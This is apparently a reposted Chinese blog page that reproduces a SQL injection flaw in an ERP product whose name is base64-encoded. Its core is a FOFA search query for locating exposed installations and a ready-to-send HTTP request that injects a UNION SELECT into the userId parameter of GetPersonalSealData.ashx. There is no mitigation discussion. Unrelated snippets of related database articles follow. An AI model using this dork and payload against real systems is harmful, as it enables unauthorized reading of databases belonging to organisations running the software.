首页 > 数据库 >5pm66YKm5Zu96ZmF ERP SQL注入漏洞复现

5pm66YKm5Zu96ZmF ERP SQL注入漏洞复现

时间:2024-05-28 14:58:22浏览次数:20  
标签:0.8 5pm66YKm5Zu96ZmF zh image Accept application en SQL ERP

FOFA:icon_hash="-682445886"

 PoC

GET /SYSN/json/pcclient/GetPersonalSealData.ashx?imageDate=1&userId=-1%20union%20select%20@@version-- HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1

查询数据库版本 

标签:0.8,5pm66YKm5Zu96ZmF,zh,image,Accept,application,en,SQL,ERP
From: https://blog.csdn.net/qq_41904294/article/details/139261676

相关文章

  • 宏景eHR showmedia.jsp SQL注入漏洞复现
    0x01产品简介宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化、协同化、流程化、战略化需求的软件。0x02漏洞概述宏景eHRshowmedia.jsp接口处存在SQL注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。0......
  • mysql8.4主从配置
    mysql8.4主从配置环境docker+mysql8.4查找mysqldockersearchmysql拉取mysql镜像dockerpullmysql运行2台mysql(mysql1,mysql2)dockerrun-itd--name=mysql1-eMYSQL_ROOT_PASSWORD=123456mysqldockerrun-itd--name=mysql2-eMYSQL_ROOT_PASSWORD=12......
  • MySQL按指定顺序排序(order by field的使用)
    新建t表CREATETABLE`t`(`id`intNOTNULLAUTO_INCREMENT,`c`intDEFAULTNULL,`name`varchar(255)COLLATEutf8mb4_general_ciNOTNULLDEFAULT'',PRIMARYKEY(`id`))ENGINE=InnoDBDEFAULTCHARSET=utf8mb4COLLATE=utf8mb4_general_ci;存......
  • 1、sqlserver的临时表
    目录sqlserver的临时表1、本地临时表2、全局临时表3、使用临时表sqlserver的临时表在SQLServer中,临时表可以帮助我们在一个会话(Session)或者一个事务(Transaction)的范围内保存临时数据。它们可以是本地或全局的。1、本地临时表本地临时表的名称以一个井号(#)开始,它仅对当前......
  • MySQL的系统变量max_execution_time小结
    参数介绍:MySQL社区版MySQL5.7.8开始,新增了MAX_EXECUTION_TIME这个系统变量,它用来限制SQL语句的执行时间,确切来说是限制只读SELECT语句。如果查询语句的执行时长超过这个阈值,MySQL将自动停止该SQL语句的执行。如果其值为0,表示不启用该超时限制功能。该参数/变量单位是毫秒(milli......
  • SQLServer常用运维SQL整理
    今天线上SQLServer数据库的CPU被打爆了,紧急情况下,分析了数据库阻塞、连接分布、最耗CPU的TOP10SQL、查询SQL并行度配置、查询SQL重编译的原因等等整理了一些常用的SQL1. 查询数据库阻塞?1SELECT*FROM sys.sysprocessesWHEREblocked<>0查询......
  • CentOS7安装PostgreSQL15以及PostGIS3.3
     安装Postgresqlyuminstall-yhttps://download.postgresql.org/pub/repos/yum/reporpms/EL-7-x86_64/pgdg-redhat-repo-latest.noarch.rpmyuminstall-yhttps://dl.fedoraproject.org/pub/epel/7/x86_64/Packages/l/libzstd-1.5.5-1.el7.x86_64.rpmyum-yinstallpos......
  • MySQL - [08] 存储过程
    题记部分  一、什么是存储过程  存储过程是事先经过编译并存储在数据库中的一段SQL语句的集合,调用存储过程可以简化应用开发人员的很多工作,减少数据在数据库和应用服务器之间的传输,对于提高数据处理的效率是有好处的。  存储过程思想上很简单,就是数据库SQL语言层面的......
  • SQLServer如何查询近3分钟最消耗CPU的SQL
    在SQLServer中,要查询近3分钟最消耗CPU的SQL语句,可以使用sys.dm_exec_query_stats动态管理视图结合sys.dm_exec_sql_text函数来获取SQL语句的文本。不过,直接查询近3分钟的数据可能需要一些额外的逻辑来筛选时间范围,因为sys.dm_exec_query_stats并不直接提供时间筛选的功能。一种......
  • SQLServer如何监控阻塞会话
    一、查询阻塞和被阻塞的会话SELECTr.session_idAS[BlockedSessionID],r.blocking_session_idAS[BlockingSessionID],r.wait_type,r.wait_time,r.wait_resource,s1.program_nameAS[BlockedProgramName],s1.login_nameAS[Blo......